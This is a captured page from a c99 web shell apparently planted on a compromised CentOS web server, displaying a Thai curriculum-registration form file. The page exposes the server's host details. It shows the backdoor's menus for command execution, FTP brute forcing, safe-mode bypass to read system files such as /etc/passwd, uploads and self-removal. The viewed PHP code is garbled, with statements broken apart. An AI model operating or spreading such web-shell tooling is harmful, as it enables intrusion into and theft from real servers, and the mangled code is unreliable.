!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reg-tools/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addCurriculum.php (11.35 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!-- Modal Success -->
<div id="modalSuccess" class="modal">
    <div class="modal-dialog">
        <div class="modal-content">
            <div class="modal-header flex-column">
                <button type="button" class="btn-close" data-dismiss="modal" aria-label="Close"></button>
                <div class="icon-box">
                    <i class="bi bi-check-circle-fill" style="color:green; font-size:70px;"></i>
                </div><br />
                <h4 class="modal-title text-center">Success</h4>
            </div>
            <div class="modal-body text-center">
                <p>ดำเนินการสำเร็จ</p>
            </div>
            <div class="modal-footer justify-content-center">
                <button type="button" class="btn btn-secondary" onClick="javascript:window.location.href='./?page=addCurriculum';" data-dismiss="modal">Close</button>
            </div>
        </div>
    </div>
</div>

<div class="container">
    <p class="fs-3">เพิ่มข้อมูลหลักสูตร</p>
    <form method="post" name="curForm" id="curForm" action="javascript:insertCur();" class="row g-3 needs-validation" novalidate>
        <input type="hidden" class="form-control" name="action" value="insertCur" />
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup01" class="input-group-text">ชื่อหลักสูตร (ไทย)</label>
                <input type="text" class="form-control" name="curNameT" id="curNameT" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup02" class="input-group-text">ชื่อหลักสูตร (อังกฤษ)</label>
                <input type="text" class="form-control" name="curNameE" id="curNameE" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup04" class="input-group-text">ชื่อย่อหลักสูตร (ไทย)</label>
                <input type="text" class="form-control" name="curNameAbbrT" id="curNameAbbrT" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup05" class="input-group-text">ชื่อย่อหลักสูตร (อังกฤษ)</label>
                <input type="text" class="form-control" name="curNameAbbrE" id="curNameAbbrE" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-12">
            <div class="input-group">
                <label for="inputGroupSelect01" class="input-group-text">วุฒิการศึกษา</label>
                <select class="form-select" name="edgSelect" id="edgSelect" required>
                    <option selected disabled value="">-- เลือก --</option>
                    <?php
                    $sql 
"SELECT * FROM rg_EduDegree";
                    
$link->query($sql);
                    while (
$data $link->getnext()) {
                        echo 
"<option value='" $data->edgId "'>" $data->edgName " " $data->edgNameE "</option>";
                    }
                    
?>
                </select>
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup03" class="input-group-text">ปีที่ปรับปรุงหลักสูตร</label>
                <input type="number" class="form-control" name="curImproveY" id="curImproveY" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroupSelect05" class="input-group-text">ระดับการศึกษา</label>
                <select class="form-select" name="elvSelect" id="elvSelect" required>
                    <option selected disabled value="">-- เลือก --</option>
                    <?php
                    $sql 
"SELECT * FROM peoplecenter.Level";
                    
$link->query($sql);
                    while (
$data $link->getnext()) {
                        echo 
"<option value='" $data->levelId "'>" $data->levelName "</option>";
                    }
                    
?>
                </select>
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup06" class="input-group-text">สาระสำคัญของหลักสูตร (ไทย)</label>
                <input type="text" class="form-control" name="curDescT" id="curDescT" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup07" class="input-group-text">สาระสำคัญของหลักสูตร (อังกฤษ)</label>
                <input type="text" class="form-control" name="curDescE" id="curDescE" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-12">
            <div class="input-group">
                <label for="inputGroupSelect01" class="input-group-text">ประเภทบัณฑิตผู้สำเร็จการศึกษา</label>
                <select class="form-select" name="ccSelect" id="ccSelect" required>
                    <option selected disabled value="">-- เลือก --</option>
                    <?php
                    $sql 
"SELECT * FROM rg_CurriculumConfig";
                    
$link->query($sql);
                    while (
$data $link->getnext()) {
                        echo 
"<option value='" $data->ccId "'>" $data->ccName "</option>";
                    }
                    
?>
                </select>
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup08" class="input-group-text">หน่วยกิตรวมขั้นต่ำ</label>
                <input type="number" class="form-control" name="curMinCredit" id="curMinCredit" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-6">
            <div class="input-group">
                <label for="inputGroup09" class="input-group-text">คะแนนเฉลี่ยสะสมตลอดหลักสูตร</label>
                <input type="number" class="form-control" name="curMinGPAX" id="curMinGPAX" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-4">
            <div class="input-group">
                <label for="inputGroup10" class="input-group-text">จำนวนปีเรียนตามปกติ</label>
                <input type="number" class="form-control" name="curNumStudyY" id="curNumStudyY" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-4">
            <div class="input-group">
                <label for="inputGroup11" class="input-group-text">จำนวนปีสูงสุดที่เรียนได้</label>
                <input type="number" class="form-control" name="curMaxStudyY" id="curMaxStudyY" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-md-4">
            <div class="input-group">
                <label for="inputGroup11" class="input-group-text">จำนวนภาคการศึกษาต่อปี</label>
                <input type="number" class="form-control" name="curNumTmPerY" id="curNumTmPerY" required />
                <div class="invalid-feedback">
                    กรุณากรอกข้อมูลให้ถูกต้อง
                </div>
            </div>
        </div>
        <div class="col-12 text-center">
            <button class="btn btn-primary" id="btnAddCurSubmit" type="submit" name="submit">Save</button>
        </div>
    </form>
</div>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<script>
    $(document).ready(function() {
        $('#edgSelect').select2({
            theme: "bootstrap-5",
            width: $(this).data('width') ? $(this).data('width') : $(this).hasClass('w-100') ? '100%' : 'style',
            placeholder: $(this).data('placeholder'),
        });
        $('#elvSelect').select2({
            theme: "bootstrap-5",
            width: $(this).data('width') ? $(this).data('width') : $(this).hasClass('w-100') ? '100%' : 'style',
            placeholder: $(this).data('placeholder'),
        });
        $('#ccSelect').select2({
            theme: "bootstrap-5",
            width: $(this).data('width') ? $(this).data('width') : $(this).hasClass('w-100') ? '100%' : 'style',
            placeholder: $(this).data('placeholder'),
        });
    });

    function insertCur() {

        var $this = $("#btnAddCurSubmit"); //submit button selector using ID
        var $caption = $this.html(); // We store the html content of the submit button
        var form = "#curForm"; //defined the #form ID
        var formData = $(form).serializeArray(); //serialize the form into array
        //var route = $(form).attr('action'); //get the route using attribute action
        var route = "./api/curriculum.php";

        //alert("call insert function");

        // Ajax config
        $.ajax({
            type: "POST", //we are using POST method to submit the data to the server side
            url: route, // get the route value
            data: formData, // our serialized array data for server side
            beforeSend: function() { //We add this before send to disable the button once we submit it so that we prevent the multiple click
                $this.attr('disabled', true).html("Processing...");
            },
            success: function(response) { //once the request successfully process to the server side it will return result here
                $this.attr('disabled', false).html($caption);

                // Reload lists of employees
                //getDataAll();
                //window.location.href='./?page=editCurriculum';
                //$('#curStrucList').DataTable().ajax.reload();
                //$('#curStrucList').DataTable().destroy();
                //getCurStructureByCur();

                // We will display the result using alert
                //alert(response);

                // Reset form
                //resetForm(form);

                // Close modal
                //$('#addCurStruc').modal().hide();
                //$(".modal-backdrop").remove();
                //$('#addCurStruc').modal().toggle();
                //$(".modal-backdrop").remove();

                if (response == "Insert Success!!") $('#modalSuccess').modal().toggle();
                else alert(response);

            },

        });
    }

    (() => {
        'use strict'

        // Fetch all the forms we want to apply custom Bootstrap validation styles to
        const forms = document.querySelectorAll('.needs-validation')

        // Loop over them and prevent submission
        Array.from(forms).forEach(form => {
            form.addEventListener('submit', event => {
                if (!form.checkValidity()) {
                    event.preventDefault()
                    event.stopPropagation()
                }

                form.classList.add('was-validated')
            }, false)
        })
    })()
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--